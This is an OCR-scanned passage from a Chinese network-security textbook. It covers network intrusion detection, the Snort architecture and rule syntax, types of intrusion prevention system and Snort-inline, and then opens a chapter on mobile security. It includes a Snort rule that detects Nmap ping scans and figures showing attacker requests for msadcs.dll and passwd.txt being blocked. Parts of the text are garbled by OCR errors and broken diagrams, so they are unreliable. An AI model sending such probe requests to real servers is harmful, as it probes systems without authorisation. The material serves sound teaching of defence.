基于 网 络 的 人 侵 检测 系统 对 网 络 上 流 经 的 数据 包 进 行 分 析 。 基 于 网 络 的 IDS 通常 利 
用 一 个 运行 在 混杂 模式 下 网 络 的 适配器 来 实时 监视 并 分 析 通 过 网 络 的 所 有 通信 了 业务。 所谓 
混杂 模式 是 指 能 够 监听 本 网 段 内 的 所 有 网 络 包 。 一 旦 检测 到 了 攻击 行为 ,IDS 的 响应 模块 
进行 通知 报警 并 对 攻击 采取 相应 的 反应 。 反 应 因 产 品 而 异 , 但 通常 都 包括 通知 管理 员 、 中 
断 连 接 并 保存 会 话 记 录 。 
基于 网 络 的 IDS 有 许多 仅 靠 基于 主机 的 和 人 侵 检测 法 无 法 提供 的 功能 。 实 际 上 ,许多 客 
户 在 最 初 使 用 IDS 时 都 配置 了 基于 网 络 的 入 侵 检测 。 基 于 网 络 的 检测 有 以 下 优点 ， 
。 检测 速度 快 。 基 于 网 络 的 监测 器 通常 能 在 微 秒 或 秒 级 发 现 问题 。 而 大 多 数 基于 主 
机 的 产品 则 要 依靠 对 最 近 几 分 钟 内 审计 记录 的 分 析 。 
。 隐蔽 性 好 。 一 个 网 络 上 的 监测 器 不 像 一 个 主机 那样 显眼 和 易 被 存 取 ,因而 也 不 那么 
容易 遭受 攻击 。 基 于 网 络 的 监测 器 不 运行 其 他 的 应 用 程序 ,不 提供 网 络 服务 ,可 以 
不 响应 其 他 计算 机 ,因此 可 以 做 得 比较 安全 。 
。 检测 范围 宽 。 基 于 网 络 的 入 侵 检测 甚至 可 以 在 网 络 的 边缘 上 实施 , 即 攻击 者 还 没 能 
接 入 网 络 时 就 被 发 现 并 制止 。 
。 较 少 的 监测 器 。 由 于 使 用 一 个 监测 器 就 可 以 保护 一 个 共享 的 网 段 ,所 以 不 需要 很 多 
监测 器 。 相 反 地 ,如 果 基 于 主机 , 则 在 每 个 主机 上 都 需要 一 个 代理 ,当主 机 数量 较 大 
时 花费 较 多 ,而 且 难 于 管理 。 但 是 ,如 果 在 一 个 交换 环境 下 , 则 需要 基于 主机 的 IDS 
配合 使 用 。 
。 攻击 者 不 易 转 移 证 据 。 基 于 网 络 的 IDS 使 用 正在 发 生 的 网 络 通信 进行 实时 攻击 的 
检测 ,所 以 攻击 者 无 法 转移 证 据 。 被 捕获 的 数据 不 仅 包括 攻击 的 方法 ,而 且 还 包括 
可 用 于 识别 黑客 身份 的 信息 。 但 对 于 高 明 的 黑客 而 言 , 通 常 采用 跳板 式 的 攻击 方 
法 , 即 利用 他 们 俘获 的 第 三 方 机 器 进行 攻击 ,而 不 是 直接 攻击 。 等 到 安全 检查 人 员 
一 级 一 级 回溯 检查 时 ,原先 的 审计 记录 可 能 已 经 不 存在 了 。 另 外 ,有 的 黑客 熟知 审 
计 记 录 ,他们 知道 如 何 操纵 这 些 文件 掩盖 他 们 的 作案 痕迹 ,如 何 阻 止 需要 这 些 信 息 
的 基于 主机 的 IDS 检测 人 侵 。 
。 与 操作 系统 无 关 。 基 于 网 络 的 IDS 作为 安全 监测 资源 ,与 主机 的 操作 系统 无 关 。 与 
之 相 比 ,基于 主机 的 系统 必须 在 特定 的 .没有 遭 到 破坏 的 操作 系统 中 才能 正常 工作 
并 生成 有 用 的 结果 。 
。 占用 资源 少 。 在 被 保护 的 设备 上 不 用 占用 任何 资源 。 








6.4 人 侵 检测 软件 Snort 


IDS 已 经 成 为 网 络 安全 体系 的 一 个 重要 组 成 部 分 。 研 究 人 员 和 厂商 实现 了 许多 具体 产 
品 , 此 外 也 出 现 了 一 些 入 侵 检测 自由 软件 ,其 中 以 Snort 最 为 著名 。 
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6.4.1 Snort 系统 简介 


1998 年 ,Martin Roesch 设计 了 Snort 用 来 辅助 分 析 网 络 流量 ,并 将 二 进 制 的 tcpdump 
数据 转换 成 用 户 可 读 的 形式 。 发 展 至 今 , Snort 已 成 为 一 个 多 平台 的 .具有 实时 流量 分 析 、 
网 络 IP 数据 包 记 录 等 特性 的 强大 的 人 侵 检测 /防御 系统 , 即 NIDS/NIPS。Snort 源码 开放 ， 
基于 GNU 通用 公共 许可 证 发 布 ,目前 由 Sourcefire 公司 提供 维护 和 管理 ,可 以 通过 免费 下 
载 获得 最 新 版 本 的 Snort。 

Snort 用 于 各 种 与 人 侵 检测 相关 的 活动 ,目前 已 有 4 种 工作 模式 : 嗅 探 器 、 数 据 包 记录 
器 .网 络 人 侵 检测 系统 和 和 人 侵 防御 系统 。 

作为 嗅 探 器 ,Snort 对 发 往 同 一 个 网 络 其 他 主机 的 流量 进行 捕捉 ,将 网 络 上 传输 的 每 一 
个 包 的 内 容 都 输出 到 显示 器 ,包括 包头 和 包 负 载 。 当 以 数据 包 记 录 器 模式 运行 时 ,Snort 采 
用 与 嗅 探 器 相似 的 方式 抓 包 ,不 同 之 处 在 于 将 收集 的 数据 记 入 日 志 而 不 是 显示 在 屏幕 上 。 
包 可 以 记录 成 ASCII 文本 形式 或 者 二 进 制 tcpdump 格式 。 

网 络 人 侵 检测 模式 (NIDS) 与 嗅 探 器 模式 很 相似 ,可 以 看 作 是 一 个 加 强 的 嗅 探 器 。 两 者 
关键 的 不 同 在 于 NIDS 模式 能 对 数据 进行 处 理 , 并 且 是 可 以 配置 的 。 这 种 处 理 不 是 简单 地 
将 数据 写 入 文件 或 是 显示 在 屏幕 上 ,而 是 对 每 一 个 包 进 行 检查 ,以 决定 它 的 本 质 是 正常 的 还 
是 恶意 的 。 当 发 现 看 似 可 疑 的 流量 时 ,Snort 就 会 发 出 警报 。 

人 侵 防御 系统 是 指 不 但 能 检测 入 侵 的 发 生 , 而 且 能 通过 一 定 的 响应 方式 终止 入 侵 行为 
的 发 生 和 发 展 ,实时 地 保护 信息 系统 不 受 实质 性 攻击 。 入 侵 防御 系统 可 以 使 用 snot 实施 前 
期 的 抓 包 工作 。 


6.4.2 Snort 体系 结构 


Snort 系统 构成 完备 ,主要 包括 捕 包 程 序 库 、 包 解码 器 、 预 处 理 器 、 检 测 引擎 和 输出 插件 
5 个 组 件 , 整 个 系统 处 理 过 程 如 图 6. 2 所 示 。 


规则 文件 下 检测 引擎) 一 (输出 插件 ) 


检测 插件 

























TD 





捕 包 程序 库 


6.2 Snort 工作 流程 


1. 捕 包 程序 库 


原始 包 是 保持 着 在 网 络 上 由 客户 端 到 服务 器 传输 时 未 被 修改 的 最 初 形 式 的 包 。 原 始 包 
所 有 的 协议 头 信息 都 保持 完整 ,未 被 操作 系统 更 改 。 典 型 的 网 络 应 用 程序 不 会 处 理 原始 包 ， 
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它们 依靠 操作 系统 读 取 协 议 信息 和 合适 的 负载 数据 。Snort 与 此 相反 : 它 需要 数据 保持 原 
始 状态 。 因 为 它 要 利用 未 被 操作 系统 剥 去 的 协议 头 信息 来 检测 某 些 形式 的 攻击 。 

Snort 利用 libpcap(UNIX/Linux 平台 下 的 网 络 数据 包 捕获 函数 包 ) 独 立地 从 物理 链 路 
上 捕 包 , 它 借 助 libpcap 的 平台 可 移植 性 成 为 一 个 真正 的 与 平台 无 关 的 应 用 程序 。 

2. 包 解 码 器 

Snort 包 解码 器 建立 网 络 堆栈 ,对 各 种 协议 元 素 进行 解码 。 在 包 通 过 各 种 协议 的 解码 
器 时 ,解码 后 的 包 数 据 将 存 人 缓冲 区 ,然后 送 到 预 处 理 程序 和 检测 引擎 进行 分 析 。 

3. 预 处 理 器 

Snort 预 处 理 器 用 来 针对 一 些 可 疑 行为 检查 包 或 者 修改 包 以 便 检测 引擎 能 对 其 正确 解 
释 。 预 处 理 器 通常 由 多 个 模块 化 的 预 处 理 插件 构成 ,在 进行 特定 处 理 过 程 中 ,各 个 持 件 一 旦 
检测 到 相应 攻击 行为 ,就 立即 通过 输出 插件 报告 。 

4. 检测 引擎 

检测 引擎 是 Snort 的 核心 组 件 。 它 由 两 部 分 构成 ,一 个 是 规则 的 组 织 , 另 一 个 是 规则 的 
匹配 。 以 Snort 2. 0 版 本 为 例 ,其 规则 的 组 织 沿用 了 传统 思想 ,采用 线性 链表 的 方法 来 组 织 
规则 。 每 一 条 规则 分 成 规则 头 和 规则 选项 两 部 分 。 规 则 头 对 应 于 规则 树 节 点 (Rule Tree 
Node,RTN) ,包含 动作 、 协 议 、 源 和 目的 IP 地址、 端口 以 及 数据 流向 ; 规则 选项 对 应 于 规则 
选项 节点 (Optional Tree Node, OTN) ,包含 报警 信息 、 匹 配 内 容 等 选项 。 下 面 给 出 一 条 
Snort 规则 : 

alert icmp $ EXTERNAL NET any —>$ HOME NET any 

(msg:"ICMP PING NMAP" ;dsize:0;itype:8;) 

这 条 规则 表示 对 任何 一 个 来 自 网 络 外 部 、 负 载 数据 为 空 并 且 为 PING Request 类 型 的 
ICMP 流量 产生 警报 ,提示 为 网 络 发 现 工 具 NMAP 发 出 的 扫描 流量 。 

NIDS 工作 模式 下 ,Snort 具有 alert log pass ,activate dynamic 几 种 预定 的 规则 动作 ， 
其 语义 如 下 : 

。 alert: 生成 警报 信息 ,并 记录 这 个 数据 包 。 

。 log: 记录 匹配 规则 的 数据 包 。 

。 pass: 忽略 匹配 规则 的 数据 包 。 

。 activate: 首先 生成 警报 信息 ,然后 激活 另 一 个 dynamic 规则 。 

。 dynamic: 等 待 被 一 个 activate 规则 激活 ,然后 进行 日 志 。 

此 外 ,Snort 还 支持 自 定义 规则 动作 类 型 ,并 附加 一 个 或 多 个 输出 模块 ,从 而 可 以 在 规 
则 文件 中 使 用 自 定义 的 规则 动作 。 

实际 运行 时 , 先 在 配置 文件 中 设 定 需要 使 用 的 规则 文件 ,然后 在 Snort 初始 化 时 将 规则 
文件 读 人 内 存 数 据 结构 中 进行 解析 ,并 逐一 分 配 到 对 应 的 链表 之 中 。 首 先 分 别 生 成 TCP、 
UDP ICMP 和 IP 4 个 不 同 的 规则 树 ,每 一 个 规则 树 包 含 独立 的 三 维 链表 : RTN、OTN 和 
指向 匹配 函数 的 指针 ,如 图 6. 3 所 示 。 

检测 引擎 中 包含 若干 检测 插件 ,提供 规则 的 匹配 服务 ,例如 全 文 内 容 匹配 、 报 文 匹配 等 ， 
检测 引擎 根据 规则 文件 ,按照 需要 调用 各 种 检测 插件 对 报 文 进行 匹配 。 当 捕获 一 个 数据 包 
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ds > 
activation | dynamic “六 一 | alert -| pass -| log 
IP | RIN 一 RTN _ 广 一 规则 树 节点 RTN 链 表 
TCP 
UDP =| RuleFpList -| RuleFpList 广 -一 规则 头 匹 配 函 数 链 表 
ICMP 
按 数据 包 | 一 | _om 上 -| _ oOTN 上 二 ~ 规则 选项 节点 OTN 链 表 
协议 分 类 vy 






OutputFpList- 一 警报 输出 函数 链表 






IOutputFpList 
OptFpList 


图 6.3 Snort 规则 三 维 链表 


时 ,首先 分 析 该 数据 包 使 用 哪 种 协议 来 确定 进行 匹配 的 规则 树 ; 然后 与 RTN 节点 进行 匹 
配 , 当 与 某 一 个 RTN 节点 相 匹 配 时 ,向 下 与 OTN 节点 进行 匹配 。 每 个 OTN 节点 包含 一 组 
函数 指针 ,用 来 实现 对 这 些 选项 的 匹配 操作 。 当 数据 包 与 某 个 OTN 节点 相 匹 配 时 , 即 判 断 
此 数据 包 为 攻击 数据 包 。 

5. 输出 插件 

Snort 的 输出 插件 接收 Snort 处 理 后 传 来 的 人 侵 数据 ,将 警报 数据 转 储 到 另 一 种 资源 或 
文件 中 ,使 得 用 户 方便 地 对 和 人 侵 数据 进行 管理 。 输 出 插件 种 类 众多 ,可 以 输出 格式 化 文本 ， 
也 可 以 发 送 SNMP trap ,还 能 记录 到 MySQL Oracle 等 数据 库 中 。 








OptFpList 上 广 盖 规则 选项 匹配 函数 链表 





6.5 人 侵 防 御 系 统 





由 于 在 入 侵 检测 系统 的 实际 使 用 过 程 中 暴露 出 诸多 问题 ,特别 是 误 报 、 漏 报 和 对 攻击 行 
为 缺乏 实时 响应 等 问题 比较 突出 ,并 且 严 重 影 响 了 系统 期 望 发 挥 的 作用 ,因此 著名 的 咨询 机 
构 Gartner 在 2003 年 的 一 份 研究 报告 中 称 入 侵 检测 系统 已 经 * 死 * 了 。Gartner 公司 认为 
IDS 不 能 给 网 络 带 来 附加 的 安全 ,反而 会 增加 管理 员 的 困扰 ,建议 用 户 使 用 入 侵 防 御 系 统 
(Intrusion Prevention System, IPS) 来 代替 IDS。Gartner 公司 认为 只 有 在 线 的 或 基于 主机 
的 攻击 阻 断 才 是 最 有 效 的 入 侵 防 御 系 统 。 这 一 报告 引起 了 业界 的 轩然大波 ,关于 这 个 问题 
的 争论 持续 了 很 长 一 段 时 间 , 但 这 个 观点 却 无 疑 推动 了 人 们 开始 更 多 地 关注 IPS 的 研究 和 
应 用 。 


6.5.1 入 侵 防 御 系 统 概念 


IPS 可 以 简单 地 定义 某 种 硬件 或 软件 设备 可 以 检测 已 知 和 未 知 攻击 ,以 此 阻止 攻击 得 
偿 , 从 而 确保 系统 安全 。 更 完整 地 说 ,IPS 是 指 不 但 能 检测 入 侵 的 发 生 ,而 且 能 通过 一 定 的 
响应 方式 终止 入 侵 行为 的 发 生 和 发 展 ,实时 地 保护 信息 系统 不 受 实质 性 攻击 的 一 种 智能 化 
安全 产品 。IPS 一 般 部 署 在 网 络 的 进出 口 处 , 当 检 测 到 攻击 企图 后 能 够 自动 地 丢弃 攻击 包 
或 采取 措施 阻 断 攻击 源 。 从 功能 上 讲 ,IPS 是 传统 防火 墙 和 入 侵 检 测 系 统 的 融合 , 它 对 入 侵 
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检测 模块 的 检测 结果 进行 动态 响应 ,将 检测 出 的 攻击 行为 在 位 于 网 络 出 入 口 的 防火 墙 模块 
上 进行 阻 断 。 然 而 ,IPS 并 不 是 防火 墙 和 入 侵 检 测 系 统 的 简单 组 合 , 它 是 一 种 有 取舍 地 吸取 
了 防火 墙 和 入 侵 检测 系统 功能 的 一 个 新 产品 ,其 目的 是 为 网 络 提 供 深层 次 的 有 效 的 安全 防 
护 。IPS 的 防火 墙 功 能 比较 简单 , 它 串 联 在 网 络 上 .主要 起 对 攻击 行为 进行 阻 断 的 作用 ,其 
本 身 也 可 以 当 作 IP 防火 墙 来 使 用 ; IPS 的 检测 功能 类 似 于 IDS, 但 相对 于 IDS 缺乏 实用 价 
值 的 响应 机 制 而 言 ,IPS 检测 到 攻击 后 可 以 采取 行动 有 效 地 阻止 攻击 ,因此 可 以 说 IPS 是 一 
种 建立 在 IDS 基础 上 的 新 一 代 网 络 安 全 产品 。 


6.5.2 入 侵 防御 系统 结构 


从 实现 方式 来 看 ,可 以 将 目前 的 IPS 分 为 如 下 几 种 。 
1. 防火 墙 与 IDS 的 联动 系统 
防火 墙 与 IDS 的 联动 系统 如 图 6.4 所 示 。 


















响应 策略 





二 全 十 用 
ES 安全 事件 








策略 知识 库 





防火 墙 

















6.4 防火 墙 与 IDS 的 联动 系统 


在 入 侵 防 御 系 统 产生 之 前 ,人 们 主要 还 是 依靠 防火 墙 和 入 侵 检测 系统 来 维护 网 络 安全 。 
由 于 防火 墙 和 入 侵 检 测 系 统 功 能 上 存在 互补 性 ,两 者 的 联动 方案 自然 成 为 人 侵 防御 思想 一 
种 较 早 的 实现 方式 。 在 联动 系统 (linkage system) 中 ,策略 制定 模块 首先 接受 入 侵 检 测 系 统 
检测 出 的 事件 ,并 参照 策略 知识 库 中 的 规则 ,决定 对 安全 事件 的 响应 策略 ; 然后 将 用 某 种 中 
间 语 言 描 述 的 响应 策略 发 送 给 防火 墙 ,防火 墙 作 为 策略 执行 模块 负责 对 其 解释 并 执行 ; 此 
外 ,根据 安全 联动 系统 的 通用 决策 流程 结构 ,策略 执行 模块 还 将 反馈 响应 效果 ,这 也 同 
P2DR2(Policy，Protection，Detection，Response，Restore) 模型 的 动态 循环 处 理 过 程 相 
吻合 。 

2. 在 线 网 络 入 侵 检测 系统 

在 线 网 络 入 侵 检测 系统 如 图 6. 5 所 示 。 

在 线 NIDS(inline NIDS) 也 称 为 内 嵌 式 NIDS, 其 类 似 于 传统 NIDS, 采 用 双 网 卡 , 设 定 
为 混杂 模式 以 监听 网 络 流 量 。 不 同 的 是 ,传统 NIDS 工作 在 旁 路 ,监听 网 络 流量 副本 ,而 在 
线 NIDS 位 于 内 外 网 之 间 , 对 所 有 进出 网 络 的 数据 进行 检查 。 如 果 发 现 和 人 侵 , 就 根据 预先 设 
定 的 规则 记录 入 侵 行为 或 者 丢弃 数据 包 , 从 而 阻 断 攻 击 。 

在 线 NIDS 具有 如 下 特点 : 

。 能 够 监视 和 保护 大 范围 的 服务 器 和 网 络 。 

。 不 仅 能 够 处 理 已 知 攻击 ,还 可 以 通过 配置 通用 规则 来 处 理 一 些 未 知 攻击 。 

。 作为 传统 NIDS 的 变 体 ,仍然 受 限 于 PC 架构 下 网 卡 抓 包 方式 的 性 能 问题 。 
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内 网 计算 机 IDS 管 理 站 内 网 计算 机 IDS 管 理 站 
图 6.5 传统 NIDS 和 在 线 NIDS 对 比 


3. 七 层 交换 机 
七 层 交 换 机 (Layer Seven Switches) 如 图 6.6 所 示 。 
正常 流量 至 网 站 服务 器 : 
Users HTTP Request:Get /default.asp 
Users HTTP Request:Get /homepage.html 
4 
= 根据 预 设 规则 丢弃 匹配 流量 


早日 日 日 日 日 日 白 1 预 设 规则 : ' 

















来 自 Internet 的 所 有 流量 : 

Attackers HTTP Request:HEAD /msadc/msadcs.dll 
Users HTTP Request:Get /default.asp 

Users HTTP Request:Get/homepage.html 


6.6 七 层 交 换 机 


一 般 来 说 ,交换 机 是 二 层 / 三 层 设备 ,但 随 着 对 高 带宽 应 用 需求 的 增加 ,七 层 交 换 机 渐渐 
兴起 ,主要 用 于 多 台 应 用 服务 器 间 的 负载 均衡 。 从 工作 流程 上 来 说 ,七 层 交换 机 首先 检查 数 
据 包 的 应 用 层 信息 (如 HTTP、DNS、SMTP) ,再 参照 预定 义 的 规则 做 出 交换 和 路 由 决策 。 

七 层 交 换 机 具有 如 下 特点 : 

。 采用 专门 的 硬件 来 获得 高 性 能 ,速度 快 ,并 且 能 够 进行 负载 均衡 和 元 余 配置 。 

。 无 法 进行 完全 的 通话 过 程 还 原 和 深层 次 入 侵 分 析 , 只 能 检测 特征 明显 的 已 知 攻击 。 

4. 应 用 入 侵 防御 系统 

应 用 入 侵 防 御 系 统 (Application IPS) 如 图 6.7 所 示 。 这 类 IPS 部 署 于 需要 保护 的 各 个 
应 用 服务 器 上 ,检测 API 系统 调用 和 内 存 管理 信息 ,并 且 需 要 根据 被 保护 的 应 用 来 定制 。 
在 能 够 切实 保护 服务 器 之 前 ,应 用 IPS 必须 基于 用 户 与 应 用 程序 间 、 应 用 程序 与 操作 系统 间 
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的 两 层 交 互信 息 来 构建 合法 行为 特征 ,形成 关于 特定 应 用 的 策略 文件 。 


| 应 用 IPS | 
| (也 称 为 应 用 防火 墙 ) ! 





应 用 程序 
(如 动态 Web 页 面 ) 


下 
用 户 交互 [ilalh 








运行 平台 
(如 Microsoft IIS) 








操作 系统 。 | 已 解码 包 原始 数据 包 
(如 windows NT) 网 络 协议 楼 



































图 6.7 应 用 入 侵 防 御 系统 


应 用 入 侵 防御 系统 具有 如 下 特点 : 

。 它 是 一 种 IPS 的 软件 实现 ,实施 白 名 单 过 滤 机 制 , 对 应 用 提供 细 粒 度 的 防护 。 
。 实施 前 必须 充分 测试 被 保护 的 应 用 系统 , 且 一 旦 应 用 升级 ,需要 重新 测试 。 
。 关 键 技术 在 于 特定 应 用 与 操作 系统 间 的 交互 机 制 和 应 用 服务 器 的 内 存 管 理 。 
5. 混合 交换 机 

混合 交换 机 (Hybrid Switches) 如 图 6. 8 所 示 。 


根据 策略 放行 正常 流量 至 网 站 服务 器 : 

















User:GET/ 
User:GET /default.asp 
4 >、 
三 一 丢弃 未 匹配 策略 的 流量 
1 
De 1 
早日 日 日 日 日 日 白 1 策略 : ! 
| Allow:/ | 
| Allow:/default.asp | 
! Implicit Deny all 有 
来 自 Internet 的 所 有 流量 : UE SE ES 
User:GET/ 
User:GET /default.asp 


Attacker:GET /passwd.txt 


6.8 混合 交换 机 


这 类 IPS 在 概念 上 是 由 上 述 七 层 交换 机 和 基于 主机 的 应 用 IPS 交叉 结合 而 成 的 , 即 它 
像 七 层 交 换 机 一 样 以 硬件 的 形式 部 署 在 服务 器 之 前 ,但 不 使 用 传统 NIDS 规则 集 ,而 类 似 于 
应 用 IPS 那样 使 用 白 名 单 过 滤 机 制 。 

以 上 几 种 IPS 从 不 同 角度 提供 了 针对 网 络 和 主机 资源 的 安全 防护 ,适用 于 不 同 的 安全 
需求 ,有 各 自 的 优 缺 点 ,在 实际 应 用 的 时 候 要 根据 具体 情况 进行 选择 。 

除了 以 上 按 系统 原理 对 IPS 进行 分 类 以 外 ,还 可 以 根据 数据 来 源 和 保护 对 象 的 不 同 将 
IPS 分 为 基于 主机 的 和 人 侵 防御 系统 (Hostrbased Intrusion Prevention System，HIPS) 和 基 
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于 网 络 的 人 侵 防御 系统 (Network-based Intrusion Prevention System,NIPS) 两 大 类 。 例 如 
上 述 应 用 入 侵 防 御 系 统 属于 HIPS ,而 在 线 NIDS 就 属于 NIPS。 

HIPS 通常 为 安装 在 受 保护 系统 上 的 软件 代理 程序 ,与 操作 系统 结合 ,监视 主机 资源 使 
用 和 系统 状态 变化 .从 而 防止 非法 的 系统 调用 。 基 于 主机 的 入 侵 防御 技术 可 以 根据 自 定义 
的 安全 策略 以 及 分 析 学 习 机 制 来 阻 断 对 主机 或 服务 器 发 起 的 恶意 入 侵 。HIPS 还 可 以 阻 断 
缓冲 区 溢出 改变 登录 口令 改写 动态 链接 库 以 及 其 他 试图 从 操作 系统 夺取 控制 权 的 人 侵 行 
为 ,整体 提升 主机 的 安全 水 平 。 

HIPS 利用 包 过 滤 、 状 态 监 测 和 实时 入 侵 检 测 等 技术 组 成 分 层 防 护 体系 ,这 种 体系 能 够 
在 提高 合理 吞吐 率 的 前 提 下 最 大 限度 地 保护 服务 器 的 敏感 内 容 。HIPS 既 可 以 以 软件 的 形 
式 戏 入 到 应 用 程序 对 操作 系统 的 调用 当中 ,通过 拦截 对 操作 系统 的 可 疑 调 用 ,提供 对 主机 的 
安全 防护 ,也 可 以 更 改 操作 系统 内 核 程 序 的 工作 方式 ,提供 比 原来 更 加 严谨 的 安全 机 制 。 

由 于 HIPS 工作 在 需 保护 的 主机 或 服务 器 上 ,其 不 但 能 够 利用 特征 和 行为 规则 检测 和 
阻止 缓冲 区 溢出 之 类 的 已 知 攻 击 ,还 能 够 防范 加 密 的 攻击 和 一 些 未 知 攻击 ,如 防止 针对 
Web 页 面 . 应 用 和 资源 的 未 授权 访问 。 但 是 ,HIPS 与 具体 的 主机 或 服务 器 操作 系统 平台 紧 
密 相关 ,不 同 的 平台 需要 不 同 的 软件 代理 程序 ,因此 具有 一 定 的 平台 依赖 性 。HIPS 目前 仍 
处 在 不 断 发 展 之 中 ,日 后 可 能 会 被 操作 系统 研发 者 直接 集成 到 具体 的 操作 系统 之 中 ,在 底层 
提供 对 于 入 侵 行 为 的 防御 功能 ,从 而 减少 后 期 单独 开发 HIPS 的 复杂 性 ,也 可 能 结合 病毒 查 
杀 和 数据 安全 保密 等 功能 成 为 一 个 综合 的 主机 防护 解决 方案 , 即 桌 面 防御 系统 。 

NIPS 也 称 为 内 嵌 式 NIDS(Inline NIDS) 或 者 IDS 网 关 (Gateway IDS) 。NIPS 系统 更 
像 是 NIDS 和 防火 墙 的 结合 体 ,通常 和 防火 墙 一 样 串联 在 数据 通道 上 。 由 于 NIPS 工作 在 
网 络 上 ,直接 对 数据 包 进行 检测 和 阻 断 ,因此 与 具体 的 主机 和 服务 器 的 操作 系统 平台 无 关 。 

在 技术 上 ,NIPS 吸收 了 NIDS 所 有 的 成 熟 技术 ,如 状态 特征 检测 .协议 分 析 与 异常 检 
测 、 后 门 检测 流量 统计 与 异常 检测 网络 陷阱 检测 网络 欺骗 检测 以 及 同步 攻击 检测 等 。 其 
中 ,状态 特征 检测 也 称 为 特征 匹配 ,是 最 广泛 应 用 的 技术 ,具有 准确 性 高 .速度 快 的 特点 。 基 
于 状态 的 特征 匹配 不 但 检测 攻击 行为 的 特征 ,还 要 检查 当前 网 络 的 会 话 状 态 ,避免 受到 网 络 
欺骗 攻击 。 

此 外 ,NIPS 使 用 与 NIDS 相似 的 报警 技术 进行 报警 。 与 NIDS 相 比 ,NIPS 根据 特定 的 
服务 和 特定 的 操作 系统 设置 一 系列 的 规则 ,其 构建 的 规则 链表 效率 大 为 提高 。NIDS 大 多 
采用 将 网 卡 设置 成 混杂 模式 进行 数据 包 的 接收 ,而 NIPS 根据 规则 的 设 定 ,只 需要 检测 通过 
其 系统 的 数据 包 ,能 够 提高 人 侵 检 测 的 资源 利用 率 , 减 少 误 报 ,便于 系统 维护 。 与 传统 防火 
墙 相 比 ,NIPS 对 数据 包 的 控制 能 力 大 大 加 强 , 对 应 用 层 和 高 层 协议 的 检测 能 力 有 了 质 的 飞 
跃 。 同 时 入 侵 检测 技术 能 实时 .有效 地 和 防火 墙 的 阻 断 功能 结合 ,大 大 简化 了 系统 管理 员 的 
工作 ,提高 了 系统 的 安全 性 。 


6.5.3 入 侵 防 御 软件 Snort-inline 


Snort-inline 是 以 NIPS 模式 工作 的 Snort, 也 称 为 内 髓 式 Snort。 早 期 的 Snort 只 是 一 
个 纯 NIDS, 并 没有 NIPS 工作 模式 。Snort-inline 实际 上 是 作为 Snort 的 一 个 实验 版 本 出 现 
的 ,在 NIDS 的 基础 上 加 入 了 IPS 功能 .实现 了 NIPS 的 功能 。 如 今 这 个 新 的 工作 模式 已 经 
走向 成 熟 ,并 集成 到 较 高 版 本 的 Snort 中 。 
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Snort-inline 相对 于 Snort 主要 有 两 点 改变 。 首 先 ,Snort-inline 使 用 libipq 代替 libpcap 
作为 捕 包 程序 库 。libipq 库 是 Linux 系统 平台 上 Netfilter/iptables 网 络 包 处 理 架 构 工 程 的 
一 部 分 ,应 用 程序 可 以 用 这 个 库 来 修改 数据 包 。 其 次 , 当 一 个 数据 包 与 规则 相 匹 配 时 ,可 以 
对 其 进行 标注 ,进而 在 匹配 结束 后 丢弃 被 标注 的 数据 包 。 

为 了 完成 上 述 的 标注 行为 ,Snort-Inline 引入 了 两 个 新 的 规则 动作 和 一 个 新 的 选项 关键 
字 。 这 两 个 新 的 规则 动作 是 drop 和 sdrop。 它 们 都 丢弃 匹配 规则 的 所 有 数据 包 , 区 别 在 于 
drop 动作 也 产生 警报 ,而 sdrop 动作 为 静默 丢弃 ,不 会 输出 相应 的 警报 信息 。 新 的 选项 关 
键 字 是 replace, 它 可 以 用 指定 内 容 蔡 换 匹 配 数据 包 的 content 关键 字 值 ,这 有 助 于 区 分 具有 
相同 特征 的 良性 和 恶意 流量 ,可 以 在 不 丢弃 包 的 情况 下 确保 安全 。 通 过 以 上 改变 ,Snort- 
inline 具备 了 NIPS 应 有 的 功能 。 


6.6 本 章 小 结 


信息 技术 的 普及 和 信息 基础 设施 的 不 完备 导致 了 严峻 的 安全 问题 。 人 们 不 得 不 通过 入 
侵 检 测 技术 尽早 发 现 人 侵 行为 ,并 予以 防范 。 入 侵 检测 技术 根据 入 侵 者 的 攻击 行为 与 合法 
用 户 的 正常 行为 之 间 明 显 的 不 同 ,实现 对 入 侵 行 为 的 检测 和 告警 以 及 对 入 侵 者 的 跟踪 定位 
和 行为 取证 。 


6.7 本 章 习 题 


. 人 侵 检测 系统 弥补 了 防火 墙 的 哪些 不 足 ? 

. 比较 基于 主机 和 基于 网 络 的 入侵 检测 系统 的 优点 与 缺点 。 

. 根据 检测 原理 ,入 侵 检测 系统 可 以 分 为 几 类 ?其 原理 分 别 是 什么 ? 
. 操作 系统 审计 痕迹 与 系统 日 志 有 哪些 不 同 之 处 ? 

. 查阅 资料 , 简 述 P2DR2 安全 模型 的 基本 思想 。 

.IPS 按照 实现 方式 可 以 分 为 哪 几 类 ? 简 述 它们 各 自 的 特点 。 

. 简 述 IDS 和 IPS 的 区 别 与 联系 。 


中 玫 
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我 国 在 移动 通信 和 领域 有 着 良好 的 发 展 基础 : 拥有 全 球 第 一 的 移动 用 户 数量 .网络 规模 、 
业务 量 、 终 端 产能 ,具有 世界 影响 力 的 互联 网 企业 ,实力 强劲 的 移动 网 络 设备 制造 商 ,等 等 。 
移动 设备 越 来 越 多 地 融入 了 人 们 的 生活 ,人 们 对 于 移动 设备 的 依赖 性 越 来 越 强 。 但 是 ,移动 
设备 的 安全 性 却 往往 被 人 们 所 忽视 ,导致 了 自己 的 利益 被 一 些 漏洞 所 损害 。 实 际 上 ,移动 设 
备 的 安全 性 同 其 他 设备 一 样 不 容 忽视 ,本 章 将 对 移动 互联 安全 技术 进行 介绍 。 

本 章 主 要 内 容 : 

。 移动 互联 网 面临 的 安全 挑战 

。 手机 病毒 

。 敏感 信息 防 泄露 技术 

。 无 线 局 域 网 安全 技术 

。 蜂窝 移动 通信 接 入 安全 

。 移 动 互联 应 用 安全 


7.1 移动 互联 网 面临 的 安全 挑战 


我 国有 超过 8 亿 的 移动 用 户 ,意味 着 超过 8 亿 的 潜在 内 容 创 造 者 、 接 收 者 和 传播 者 ,这 
一 方面 为 优秀 文化 的 创造 与 传播 构建 了 一 个 宽广 的 平台 ,但 另 一 方面 也 使 不 良 文化 甚至 违 
法 信息 的 生产 与 传播 有 了 可 乘 之 机 ,垃圾 信息 就 是 最 普遍 的 一 种 不 良 文化 传播 方式 。 移 动 
号 码 的 唯一 性 与 使 用 方便 性 将 导致 垃圾 信息 的 传播 更 准确 、 更 便捷 ,而 我 国 海量 的 移动 用 户 
将 使 垃圾 信息 的 传播 空间 大 大 增加 ,垃圾 信息 的 管理 难度 不 断 增 大 。 另 外 ,我 们 还 需要 考虑 
更 多 、 更 具 威 胁 的 行为 。 

